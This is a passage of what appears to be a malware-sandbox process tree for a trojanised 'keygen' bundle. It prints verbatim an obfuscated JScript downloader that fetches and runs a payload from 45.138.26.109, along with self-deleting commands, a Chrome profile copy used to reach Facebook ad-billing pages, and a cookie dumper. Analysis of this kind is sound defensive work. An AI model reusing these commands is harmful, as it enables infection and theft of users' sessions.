                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:2596
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1536
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                        keygen-step-1.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2920
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                        keygen-step-2.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Modifies system certificate store
                                                                                                                        PID:2928
                                                                                                                        • C:\Users\Admin\AppData\Roaming\CCB4.tmp.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\CCB4.tmp.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:2472
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\CCB4.tmp.exe"
                                                                                                                            5⤵
                                                                                                                              PID:3032
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                6⤵
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:2096
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                            4⤵
                                                                                                                            • Blocklisted process makes network request
                                                                                                                            • Modifies system certificate store
                                                                                                                            PID:2788
                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                              ping 127.0.0.1
                                                                                                                              5⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:2420
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                          keygen-step-3.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3000
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                            4⤵
                                                                                                                              PID:2080
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                5⤵
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:2212
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                            keygen-step-4.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            PID:1588
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2788
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\DCJ2O38E9C\multitimer.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\DCJ2O38E9C\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:2688
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DCJ2O38E9C\multitimer.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DCJ2O38E9C\multitimer.exe" 1 101
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2252
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\YOA7YBS5V0\setups.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\YOA7YBS5V0\setups.exe" ll
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:2060
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JLE22.tmp\setups.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JLE22.tmp\setups.tmp" /SL5="$20278,1873631,71168,C:\Users\Admin\AppData\Local\Temp\YOA7YBS5V0\setups.exe" ll
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:2828
                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                                                                                                                                    7⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:2540
                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:275457 /prefetch:2
                                                                                                                                      8⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:1628
                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:275474 /prefetch:2
                                                                                                                                      8⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • NTFS ADS
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:3456
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?MTYwNDE=&pkFIcK&oa1n4=x33QcvWYaRuPCYjDM__dTaRBP0zYHliIxYq&s2ht4=YmKrSCJ2vfzSk2bCIFxjw8V7dSTvVgfBOKa1TbgC-jgeDLgEOn8xZC1lE87etzkWNzVaYsJSB-RyJYA5M-5qWFLJp2wj2zbUUc8MjxBKL7WBTxOkbVloT5w5Bn6jPFaKarhF0AEFgUlvNfp13pUnGASPuMm9wsfSzRD12q-qT8rdwn5Md&YdpNTM1NQ==" "2""
                                                                                                                                        9⤵
                                                                                                                                          PID:4064
                                                                                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                            wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?MTYwNDE=&pkFIcK&oa1n4=x33QcvWYaRuPCYjDM__dTaRBP0zYHliIxYq&s2ht4=YmKrSCJ2vfzSk2bCIFxjw8V7dSTvVgfBOKa1TbgC-jgeDLgEOn8xZC1lE87etzkWNzVaYsJSB-RyJYA5M-5qWFLJp2wj2zbUUc8MjxBKL7WBTxOkbVloT5w5Bn6jPFaKarhF0AEFgUlvNfp13pUnGASPuMm9wsfSzRD12q-qT8rdwn5Md&YdpNTM1NQ==" "2""
                                                                                                                                            10⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            PID:3824
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c 73twf.exe
                                                                                                                                              11⤵
                                                                                                                                                PID:2852
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\73twf.exe
                                                                                                                                                  73twf.exe
                                                                                                                                                  12⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4000
                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:799756 /prefetch:2
                                                                                                                                          8⤵
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:3900
                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:799776 /prefetch:2
                                                                                                                                          8⤵
                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:2944
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NTIyNjYw&pjDFUJ&s2ht4=zRGUKVxoqbk6rPE52pZDLGpbD1DB6gqVmAH16-t_B0erFOfQC5zUawfwYwyYpbAF4Qo62viUXVnBWciZOC-xaNMA5MqpadR7I_3V6hm7UTcs8nlBWGu2JZ_OkaVVkgvAlTn637&oa1n4=xHrQMrXYbRzFFYHfLfjKRqZbNU&OVHBgvDzWMzE3MQ==" "2""
                                                                                                                                            9⤵
                                                                                                                                              PID:3828
                                                                                                                                              • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NTIyNjYw&pjDFUJ&s2ht4=zRGUKVxoqbk6rPE52pZDLGpbD1DB6gqVmAH16-t_B0erFOfQC5zUawfwYwyYpbAF4Qo62viUXVnBWciZOC-xaNMA5MqpadR7I_3V6hm7UTcs8nlBWGu2JZ_OkaVVkgvAlTn637&oa1n4=xHrQMrXYbRzFFYHfLfjKRqZbNU&OVHBgvDzWMzE3MQ==" "2""
                                                                                                                                                10⤵
                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                PID:4016
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c byvfs.exe
                                                                                                                                                  11⤵
                                                                                                                                                    PID:3188
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\byvfs.exe
                                                                                                                                                      byvfs.exe
                                                                                                                                                      12⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4028
                                                                                                                                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2540 CREDAT:930849 /prefetch:2
                                                                                                                                              8⤵
                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:2188
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:1784
                                                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                        5⤵
                                                                                                                                          PID:3008
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                            6⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2932
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops Chrome extension
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3040
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                          5⤵
                                                                                                                                            PID:956
                                                                                                                                          • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                            xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                            5⤵
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            PID:1756
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                            5⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:956
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6516e00,0x7fef6516e10,0x7fef6516e20
                                                                                                                                              6⤵
                                                                                                                                                PID:1076
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=940 /prefetch:2
                                                                                                                                                6⤵
                                                                                                                                                  PID:2524
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1308 /prefetch:8
                                                                                                                                                  6⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:3068
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2568
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
                                                                                                                                                    6⤵
                                                                                                                                                      PID:1068
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2540 /prefetch:1
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2480
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2192 /prefetch:1
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2716
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2184 /prefetch:1
                                                                                                                                                          6⤵
                                                                                                                                                            PID:1984
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
                                                                                                                                                            6⤵
                                                                                                                                                              PID:600
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
                                                                                                                                                              6⤵
                                                                                                                                                                PID:1764
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1064 /prefetch:2
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:2632
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1068,2218719299474462056,913659850842771764,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1352 /prefetch:8
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:3100
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1752
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:3024
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:2080
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2212
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3464
                                                                                                                                                                  • C:\ProgramData\4409140.exe
                                                                                                                                                                    "C:\ProgramData\4409140.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3636
                                                                                                                                                                  • C:\ProgramData\1151988.exe
                                                                                                                                                                    "C:\ProgramData\1151988.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:3652
                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3784
                                                                                                                                                                  • C:\ProgramData\8832387.exe
                                                                                                                                                                    "C:\ProgramData\8832387.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:3732
                                                                                                                                                                    • C:\ProgramData\8832387.exe
                                                                                                                                                                      "{path}"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3220
                                                                                                                                                                  • C:\ProgramData\5074746.exe
                                                                                                                                                                    "C:\ProgramData\5074746.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3804
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  PID:3920
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3964
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3160
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3700
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:1328
                                                                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x5b4
                                                                                                                                                            1⤵
                                                                                                                                                              PID:528
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\haleng.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\haleng.exe"
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:844
